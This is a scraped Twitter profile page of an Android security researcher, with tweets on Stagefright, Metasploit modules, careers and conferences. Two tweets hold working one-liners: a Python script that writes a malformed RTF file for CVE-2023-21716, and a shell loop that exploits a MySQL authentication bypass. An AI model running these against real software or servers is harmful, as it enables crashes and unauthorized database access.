Joshua J. Drake
@jduck
Followers
28,032
Following
1,564
Media
130
Statuses
18,969
A funemployed researcher living in the intersection between security and embedded Rust.
Austin, TX
Joined December 2009
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Venezuela
• 2138873 Tweets
Rayssa
• 909476 Tweets
#OlympicGames
• 311014 Tweets
Lewis
• 231694 Tweets
Russell
• 180565 Tweets
Japão
• 173810 Tweets
Victoria
• 158567 Tweets
Lebron
• 148944 Tweets
Team USA
• 135014 Tweets
金メダル
• 127579 Tweets
Larissa
• 113240 Tweets
阿部一二三
• 91506 Tweets
Rebeca
• 88583 Tweets
#BBNaija
• 86083 Tweets
Tatum
• 78677 Tweets
Kevin Durant
• 68904 Tweets
سلمان
• 66180 Tweets
Serbia
• 64852 Tweets
Embiid
• 55751 Tweets
Léon Marchand
• 49105 Tweets
Steph
• 47034 Tweets
スケボー
• 45256 Tweets
ブラジル
• 44702 Tweets
Bia Haddad
• 30591 Tweets
#النصر_بورتو
• 28805 Tweets
Cubs
• 28356 Tweets
Jokic
• 22394 Tweets
Paredes
• 21499 Tweets
Alexia
• 18597 Tweets
女子サッカー
• 17893 Tweets
İsrail
• 17275 Tweets
Steve Kerr
• 16111 Tweets
Zambia
• 13472 Tweets
Andy Murray
• 12579 Tweets
Shaun
• 11096 Tweets
Pinned Tweet
Is your vendor committed to memory safe software? Maybe you should ask them. FWIW younger companies seem to be making the right decision up front.
@NetRiseInc
@runZeroInc
@spr_networks
are a few examples.
1
2
15
CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
20
252
878
Metasploit module for CVE-2015-3864 now available! Pull Request:
7
174
202
Here's a teaser of my CVE-2015-3864 Metasploit module. It improves on Metaphor significantly. See it in real time:
8
160
205
Android Hacker's Handbook is now shipping! Get yours today! Electronic version release will be in ~ 2 weeks
http://t.co/8fuwt8BgZt
22
173
132
I'm officially fun-employed and looking for my next role. If you can see me filling a full time, part time, or contract position near you hit me up.
24
84
127
Also... ICYMI, I joined Amazon. Amazed by all the quality people I know inside. <3
10
3
102
I'm pleased to announce that I'm joining the zLabs team at
@ZIMPERIUM
http://t.co/DZdm98UotV
56
36
87
I'm excited and honored to be invited to provide a keynote address Tuesday August 9th at USENIX WOOT!
11
20
85
Dirty Pipe root exploit for Android (Pixel 6) -
1
27
82
I'm looking for a graphic designer to create some assets for my web site and business cards. Any recommendations?
90
3
76
Google rewarded me $1,337 for these patches. That's after I talked them up from $1,000. Now Android has a VRP!
18
63
77
Apparently
#Stagefright
had a cameo on
#MrRobot
tonight. I binge watched season 1 two weeks ago, but no season 2 yet. Woot. I'm honored!
5
12
76
Hopefully this little tool will make Android device privilege auditing a bit easier for you - - Enjoy!
0
52
78
If you're new to vulnerability research or thinking about starting, come see
@SushiDude
and I's talk at
@defcon
24!
4
38
69
UDP Broadcast Command Execution as root on ASUS Routers (via infosvr) (cat's out of the bag:
http://t.co/TCkIMDVBJA)
5
85
65
@aragogando
@oscaron
@revskills
@taviso
for every tavis, there are 4 nations and 6 companies willing to buy it, find bugs, and not report
1
25
64
Windows 7 Update appears to be compromised. Updates with random-ish names appearing on endpoints and WSUS servers
http://t.co/Gz1l3BhvQu
9
152
61
@davepl1968
I still would love to know more about why it tells you there's an unspecified security risk when you browse into one. I have my thoughts, but you would be the expert.
4
0
62
The time for change has come. Last four years at Accuvant: transformative. My last day: this Friday. New gig? I'll announce next Monday.
48
13
60
Infosec... I'm pretty sure there are 5x more recruiters than actual qualified candidates in the market.
7
8
60
If you are looking for my
@BlackHatEvents
/
@_defcon_
slides you can find them here:
http://t.co/BkXYuL38Pf
2
44
55
UDP Broadcast Command Execution as root on ASUS Routers (via infosvr)
5
65
55
Most people think my Stagefright work was all positive. Underneath the surface, I lost a lot of good friends and caused a lot of resentment. I found that dealing with the press was draining and ultimately I withdrew from the industry for years after. Hindsight is enlightening.
14
5
56
Maybe this other little tool will make auditing Android devices file systems a bit easier - - (compliments privmap)
3
31
54
On C++ exploitation - For code exec: look for objects with vtables (virtual methods). For infoleak: look for objects without any
2
20
50
trying not to spend more than the google patch rewards program gives for unassisted Android remote vulns...
http://t.co/1LemLVIh1m
2
32
48
I couldn't agree more with
@daveaitel
recent mailing list post. A random URL I visit should not have the same access to browser functionality as something I visit every day.
8
11
49
If Google Pixel phones are not available unlockable, I won't buy/endorse them. Freedom for owners to control their device is paramount IMHO.
3
14
44
LOL @ latest MySQL auth bypass -
http://t.co/OJg4vbL8
- while ! mysql -uPasswordedUser -pAnything; do false; done
3
113
45
Up to $200,000 for Android exploits!
0
28
43
If you've never seen "The Net" starring Sandra Bullock, you're over due. Starting to wonder if these security product companies watched it and got crazy ideas.
13
7
44
Zero Day Exploit Firm
@ExodusIntel
Goes Full-Disclosure on an unpatched Stagefright Vulnerability
2
57
42
Wow I haven't said anything here in a long time. How is everyone?
11
2
40
Imagine using an ffmpeg vulnerability to compromise YouTube and then using that access to compromise everyone that watches YouTube.
5
4
41
Declined for BlackHat... Guess everyone will get to see the exploit sooner than later =) Pretty happy about that actually.
14
10
38
In case you were wondering... We present the Table of Contents of The Android Hacker's Handbook -
http://t.co/xJ5bIowgRm
7
62
39
There's a certain irony in seeing malware authors use Rust while industry drags their feet and resists the movement.
7
2
36
If you didn't want to write format string exploits from scratch,
@metasploit
has:
http://t.co/MA1C3gth9L,
example:
http://t.co/n20NAEEv9K
1
25
36
BTW! If you want to see the code behind the ASUS router bug, look here: My favorite part is line 240!!!
5
34
35
Just in case you thought ASLR mitigates libstagefright vulnerabilities -- Maybe patching is the best bet after all.
2
39
33
I haven't looked in depth, but this has the potential to be very bad -
http://t.co/gasTyZ9dgm
Stay tuned.
3
41
33
FTR, CVEs for my Stagefright report: CVE-2015-1538, CVE-2015-1539, CVE-2015-3824, CVE-2015-3826, CVE-2015-3827, CVE-2015-3828, CVE-2015-3829
3
32
33
I've had an amazing
@secwest
@CanSecWest
. Utmost love and respect to
@ivansprundel
@richinseattle
Joseph, Ethan, and many more amazing humans. To the future where hopefully we find the best. 🍻
3
4
34
Hardening Measures in Android N Cripple System Utility and Security Applications
7
31
32
my wife is getting super close to giving birth. (2nd / girl) so nervous and excited. I'll be on extended afk soon
33
0
30
I've been evaluating MTE on Pixel 8 Pro. I guess it's sort of my own private CTF. If someone at Google/Android would like to sponsor the work, that would be awesome. If not, oh well. Either way, coming soon-ish...
3
4
32
One thing I have learned from Pegasus and Stagefright is that vendor security teams seem to misunderstand their attack surfaces.
4
22
32
I heard there was a new Java 0day found being exploited in the wild --
http://t.co/ivRhGJTL
4
125
32
The
#Stagefright
public exploit release is held up by marketing. I'm doing a FrienNDA beta , tell me your github!
42
19
31
I thought about putting up an access point called "Samsung Galaxy Note 7" on the plane but then didn't want to cause panic or delays.
1
5
32
Yay!
@BlackHatEvents
graciously accepted my submission to speak about my research on
@Android
's StageFright!
7
29
30
that feeling when you realize why "rm -rf ~" is taking so long.
6
37
31
To those we have lost, rest well. To those that remain, I hope your 2022 will be everything you want it to be. Happy new year!
1
0
31
Remember kids, Android devices are like snowflakes. No two are identical.
4
103
29
Looks like
@metasploit
is finally getting some
@Android
love! Several post modules just added to remove lock screens etc.
0
25
30
A whole day of OSS dumpster fire and no annotated disassembly? I guess we all value our weekend over the truth.
4
0
28
wouldn't it be funny if one day people found out the entire jailbreak scene was a giant XXX_ebooks style network of AI bots (excl producers)
2
8
29
Despite
@daveaitel
's comments, I think this paper is a good primer for those new to the vulnerability landscape
2
14
28
Reversing and Auditing Android's Proprietary Bits (my
@reconmtl
slides are now available at
http://t.co/Ux8GS0V6rT)
cc
@iamnion
2
45
29
How come no one is talking about how the iOS 9.3 advisory lists CVE-2016-0801/0802 (remote kernel RCE via wifi on Android) ?!
5
33
28
I've been diving into
@radareorg
the last few days. I'm really impressed and hoping to do what I can to push the project forward =)
0
15
29
Take away from automotive
@Pwn2Own_Contest
? Whoever develops these products have nearly zero understanding of security/common attacks. Also, who certified all this stuff??? What are they even doing?
2
4
28
Honored to be nominated for
@PwnieAwards
in multiple categories but doubt I'll win in any... OMG what a year for infosec.
6
3
29
I missed BH/DC this year for the first time in 13 years. Didn't really miss Vegas, but I definitely missed some of you fine people. Hope you had fun and stayed safe.
4
0
29
Just released the advisory for two Android SDK security issues I found -
http://t.co/1o0tWJ113X
5
36
27
The
@Blackphone_ch
guys sent this to thank me for the bug report! Thanks
@Netsecrex
for the booze and kind words!!
http://t.co/BDm8J03N8g
5
15
28
For some unknown reason, I just woke up in the middle of the night thinking the HP CEO should face criminal charges for bricking printers. If I bricked a bunch of printers, I would expect to face charges. But hey, I don't even like printers.
0
11
25
Another great memory from this year's
@defcon
... Explaining reverse engineering to
@mc_frontalot
at the 562 party. "When you can reverse engineer, everything is open source."
5
3
25
Protecting from HackingTeam’s Mobile APT › Zimperium Mobile Security Blog -
http://t.co/EpIIU8WtdH
1
20
25
The previously FrieNDA'd repository is now public. Feel free to send pull requests!
1
30
24
In case you all missed it.
@Blackphone_ch
just announced the first ever bug bounty for an AOSP-based smartphone OS. Before Google.
2
37
25
No amount of money is worth being forced into traffic, health exposures, and a bad work environment -- especially not just to have a teleconference.
0
2
24
~ 1 year old technical talk about exploiting Stagefright -
0
7
25
It's that time of the month again... Security fixes for Android with some details here
0
24
24
POLL: If I exploit a vulnerability in Android's libc via an SMS, what category of Mobile Pwn2Own prize should be awarded? Lawyers welcome.
10
19
24